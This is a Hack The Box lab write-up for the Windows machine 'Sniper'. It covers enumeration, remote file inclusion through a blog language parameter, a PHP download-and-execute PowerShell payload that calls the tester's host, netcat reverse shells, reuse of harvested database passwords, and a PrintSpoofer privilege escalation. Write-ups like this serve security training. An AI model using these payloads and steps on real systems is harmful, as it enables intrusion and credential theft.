HTB - Sniper

Machine Info

Sniper is a medium difficulty Windows machine which features a PHP server. The server hosts a file that is found vulnerable to local and remote file inclusion. Command execution is gained on the server in the context of NT AUTHORITY\iUSR via local inclusion of maliciously crafted PHP Session files. Exposed database credentials are used to gain access as the user Chris, who has the same password. Enumeration reveals that the administrator is reviewing CHM (Compiled HTML Help) files, which can be used the leak the administrators NetNTLM-v2 hash. This can be captured, cracked and used to get a reverse shell as administrator using a PowerShell credential object.

Enumeration

---

Scope

IP Address: 10.10.10.151

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE      REASON
80/tcp  open  http         syn-ack
135/tcp open  msrpc        syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p -sCV $ip -Pn -oN Nmap/script-scan

PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Sniper Co.
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T12:18:29
|_  start_date: N/A
|_clock-skew: 7h00m01s

* Open ports: 80,135,139,445
* UDP Open ports: None
* Services: HTTP - RPC - SMB
* Versions:
* Important Notes:

RPC & SMB Enumeration

Nothing found from rpcclient

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

smb anonymous login failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ smbclient -N -L //$ip                       
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ crackmapexec smb $ip -u '' -p '' --shares                                           

SMB         10.10.10.151    445    SNIPER           [-] Sniper\: STATUS_ACCESS_DENIED 
SMB         10.10.10.151    445    SNIPER           [-] Error enumerating shares: Error occurs while reading from remote(104)

HTTP Enumeration

Looking at wapplayzer

http://10.10.10.151/user/login.php

I registered an account and try to login with it, but the site didn't have any thing

Initial Access

---

Shell as iusr

Under http://10.10.10.151/blog/ there is a parameter ?lang which include blog-en.php

When I tried to include local file such as /etc/hosts located at C:windows\system32\drivers, It returned the file content

Since, this is windows machine I will try LFI to my smb server

Craft the url to call our server and we got a hit

http://10.10.10.151/blog/?lang=\\10.10.16.3\share

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49692)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully

I tried then to get RCE via download a reverse_shell.ps1 and execute it on the fly

http://10.10.10.151/blog/?lang=\10.10.16.3\share\shell.php

shell.php content

<?php system("IEX (New-Object Net.webclient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"); ?>

start nc listener and include the remote shell

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ rlwrap nc -lvnp 443 
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.151] 49711
Windows PowerShell running as user SNIPER$ on SNIPER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot\blog>

We are in a web server folder which can contain database connection string or credentials for login

PS C:\inetpub\wwwroot> type user\db.php

<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>

It's database credentials, I looked at open ports listening locally and found that mysql default port 3306 is there

PS C:\inetpub\wwwroot> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       872
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       6752
<snip>

To connect to the database, I need fully interactive shell, So I will map mysql port to my local machine using chisel

run Nmap against the port locally to verify

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ nmap -p3306 localhost                                  

PORT     STATE SERVICE
3306/tcp open  mysql

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ mysql -h 127.0.0.1 -u dbuser sniper -p'36mEAhz/B8xQ~2VM'

MySQL [sniper]>

MySQL [sniper]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| sniper             |
+--------------------+
2 rows in set (0.391 sec)

MySQL [sniper]> use sniper;
Database changed
MySQL [sniper]> show tables;
+------------------+
| Tables_in_sniper |
+------------------+
| users            |
+------------------+
1 row in set (0.166 sec)

MySQL [sniper]> select * from users;
+----+-----------+------------------+----------------------------------+---------------------+
| id | username  | email            | password                         | trn_date            |
+----+-----------+------------------+----------------------------------+---------------------+
|  1 | superuser | admin@sniper.co  | 6e573c8b25e9168e0c61895d821a3d57 | 2019-04-11 22:45:36 |
|  8 | hacker    | hacker@gmail.com | 6c569aabbf7775ef8fc570e228c16b98 | 2024-07-11 05:31:48 |
+----+-----------+------------------+----------------------------------+---------------------+

Shell as Chris

I found two users, one I created when registering in webapp and admin user, but when I tried to crack the hash of admin, I failed

Looking at users on the system. Chris user has a profile, Let's try the password we found of the dbuser with him instead

PS C:\inetpub\wwwroot\blog>dir C:\Users\                                                                                                                   
    Directory: C:\Users                                                                                                                                      
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         4/9/2019   6:47 AM                Administrator
d-----        4/11/2019   7:04 AM                Chris
d-r---         4/9/2019   6:47 AM                Public

And we got a hit, but I need a shell with that user as I we don't have remote access with him

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ crackmapexec smb $ip -u 'Chris' -p '36mEAhz/B8xQ~2VM'

SMB         10.10.10.151    445    SNIPER           [+] Sniper\Chris:36mEAhz/B8xQ~2VM  

So, I download RunasCs.exe from my kali to the machine

PS C:\Windows\Temp> curl 10.10.16.3/RunasCs.exe -o .\r.exe

Execute it as Chris user to have a shell as that use

PS C:\Windows\Temp> .\r.exe Chris '36mEAhz/B8xQ~2VM' powershell.exe -r 10.10.16.3:8443

start nc listener and wait for a shell

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Sniper]
└─$ rlwrap nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.151] 49738

PS C:\Windows\system32> 

Get the flag

PS C:\Users\Chris> type Desktop\user.txt

44d27619bef1f819476fxxxxxxxxxxxxxxxxx

User Flag: 44d27619bef1f819476fxxxxxxxxxxxxxxxxx

---

Privilege Escalation

When I typed tree /F to explore the folder content, I found weird file extension I didn't seen before .chm

PS C:\Users\Chris> tree /F

Folder PATH listing
Volume serial number is AE98-73A8
C:.
3D Objects
Contacts
Desktop
       user.txt
       
Documents
Downloads
       instructions.chm
<snip>

I searched at google for it and found that it's a compiled HTML Help file

I found this useful post:

Weaponize .chm files with PowerShell — NishangR3d Buck3T

Personally, I couldn't download this program as it's available on Microsoft center to download so I will reach administrator admin with unintended path

Shell as SYSTEM

I found that iusr has SeImpersonatePrivilege which can be abused to escalate to SYSTEM account

PS C:\Windows\Temp> whoami

nt authority\iusr
PS C:\Windows\Temp> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

I need PrintSpoofer.exe tool, So I will download it to the box and execute it to get a reverse shell as SYSTEM

Get root flag

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
f65247f419e1087df1fxxxxxxxxxxxxx

Root Flag: f65247f419e1087df1fxxxxxxxxxxxxx